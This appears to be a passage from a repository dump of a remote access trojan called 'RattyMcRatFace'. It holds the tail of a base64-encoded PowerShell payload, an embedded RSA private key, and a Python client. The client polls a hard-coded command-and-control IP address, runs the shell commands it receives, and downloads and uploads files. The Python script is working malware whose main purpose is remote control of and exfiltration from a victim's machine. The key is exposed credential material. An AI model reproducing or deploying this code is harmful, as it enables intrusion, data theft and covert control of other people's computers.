gBpAGwAZQBQAGEAdABoAC4AUgBlAHAAbABhAGMAZQAoACIAJwAiACwAIgAiACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAgAH0AIABjAGEAdABjAGgAIAB7AH0AOwAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJAByAGUAcwBwAG8AbgBzAGUAOwAgAHMAbABlAGUAcAAgADMAIAA=
77 |
78 |
85 |
--------------------------------------------------------------------------------
/RattyMcRatFace_Keys.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEowIBAAKCAQEAicD1XiDlkSsqpPG+iGg1qxZFaVEngT8Vt4AJ1LpJxay2K4b/V2ukGi/zIrsz
3 | L4KT61orPCpKiBz6eXp3ecuvSOXj/aAex5QAthFANrkilxTjWAEEBzgWCO1CkCoS/f3taJsSi45H
4 | 9XYSrnHgUHaXx7oEyUTIAgPgoUUYbeSA0IHZ7pjdE6TPT01+QyXnfS99zfqUH/nVM9n/3waJAOdy
5 | esFgaDMUBddD4PSZKttyYuwH2DCXIXwpuTUwMIVOkgHZoLm79NqgozldyghdV3box1sRr4u9TFIL
6 | gzcFT3gqxtd38ZI/gD2tmkbu2lFBXyjMQWm6K425MYQod0Zfxm9acwIDAQABAoIBAC6UIGODnBxK
7 | DFFZrKNTGVKQZUgHOORrAFzb3ncfxnIgxDhTnWNh8ksoi33i7pvR+1JJWvUtF6aOpeMNlfiI9uwf
8 | T8girEWvtc3aZ2wZjaioV3caYNJQFKNQFoHIuENJ6UzFoq+tnIdTNV3nA4Ixl4DhVVz49Og5h2sA
9 | ghImgaf+vSJoTduvtm+jNEfop7TCSH52zHY1V8zBA9mg7/Eg13XhKnOuIUzsPgHwCGq1yxcTWRG+
10 | /dg59/wTFdDjeNDSTXiEnxJsRGrnhlz81luOSbvWtWd3AIB4tvvqvL9YowYAd1HKoDF80GiKHDBT
11 | mJy/QyYd9pltGGHpjn9U7BVlLAECgYEA8ieLTzkvvOU1cori8uUfp8PqdJSUQcddkjKOLxIUuKtT
12 | Plt52yEZo4s0hHDaTu0+8r4O2MyimLhWaapsbDpJGRpmIItwGst1sXwJ259HuIxplculy6ryk1wT
13 | xJZgYUhuLkT44WzrvPTbtySL3FTpXPi+EKZUAOmwOXARJOqIM2ECgYEAkaFIg6QkpKDhGpAv6+++
14 | ig/8Z3scN+ervWaL1WFp0t7bXkAxrcSbfWv0FeV2Qi3K1vAUn+9Ipr6SC8q/3Xy+3xUujUhiT5pC
15 | pE31CpZOLhR98jUVWubD71HQtxZfqVkIphEg1JnqmAwRJakFD3TO3q3Di054izESCM1/xbzV8lMC
16 | gYB64dhO3p08BTCHLLWYPu8+aiwK9u75Jlt0ehUvC8TaJY67oR4INhbVqCmBX+dYkAoWkp3kJIwK
17 | ZdjsDCCzFyzLAVt7/mZoIoFaDLDP81co7pASBOLgpKIuZ1Zct1a3Z1MKRdPqSSSjobnxiSk0KR63
18 | ID8LIeyU/gGAVD9O9XkiYQKBgEWok/sD5NMqcQI3vfRpNQbtJpqI9LJ5ClkKWBC1C91l5CBtLFYm
19 | GQohPRvMKoj1RnURWYw29NVtioZBcQ0MwnAKvb2uxfe1nfLhpzhtNPAttSDJ63ETuN0ckW1CMnfa
20 | spxczQtkpCYef4U4F8eQ4/L3wvU7j8Vkr2+ufFOlQ+EpAoGBAJWxgaqGa35NGRmUONki9F/dRhW5
21 | Vdbn+EyDnT0vLThl5RQIXGXsI/jYWGkpvY/6D5L9riBEx8xRXI2+DFLGVgqmVBolvi6jVpzT1JBb
22 | Ekvr6AZcKe4Dhc0DnhtWcrqK+LvVy0lje1eqZAtxrpFCyMEuyFqNOQgks6neHr7sqbJL
23 | -----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/pyRattyMcRatFace.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from subprocess import call
3 |
4 | def GetCommand(c2):
5 | return (requests.get(c2)).text
6 |
7 | def ShellExecute(cmd, cmdArgs):
8 | call([cmd, cmdArgs])
9 |
10 | def Download(url, fileName):
11 | open(fileName,'wb').write(requests.get(url).content)
12 |
13 | def Upload(url, fileName):
14 | files = {'file': open(fileName, 'rb')}
15 | requests.post(url, files=files)
16 |
17 | c2 = "http://64.137.224.218/file.html"
18 | while True:
19 | cmdString = GetCommand(c2)
20 | cmd = cmdString.split()[0]
21 | if cmd == "run":
22 | ShellExecute(cmdString.split()[1], cmdString.split()[2])
23 | elif cmd == "download":
24 | Download(cmdString.split()[1], cmdString.split()[2])
25 | elif cmd == "upload":
26 | Upload(cmdString.split()[1], cmdString.split()[2])
27 | elif cmd == "exit":
28 | exit()
29 | else:
30 | pass
31 |
32 |
33 |
--------------------------------------------------------------------------------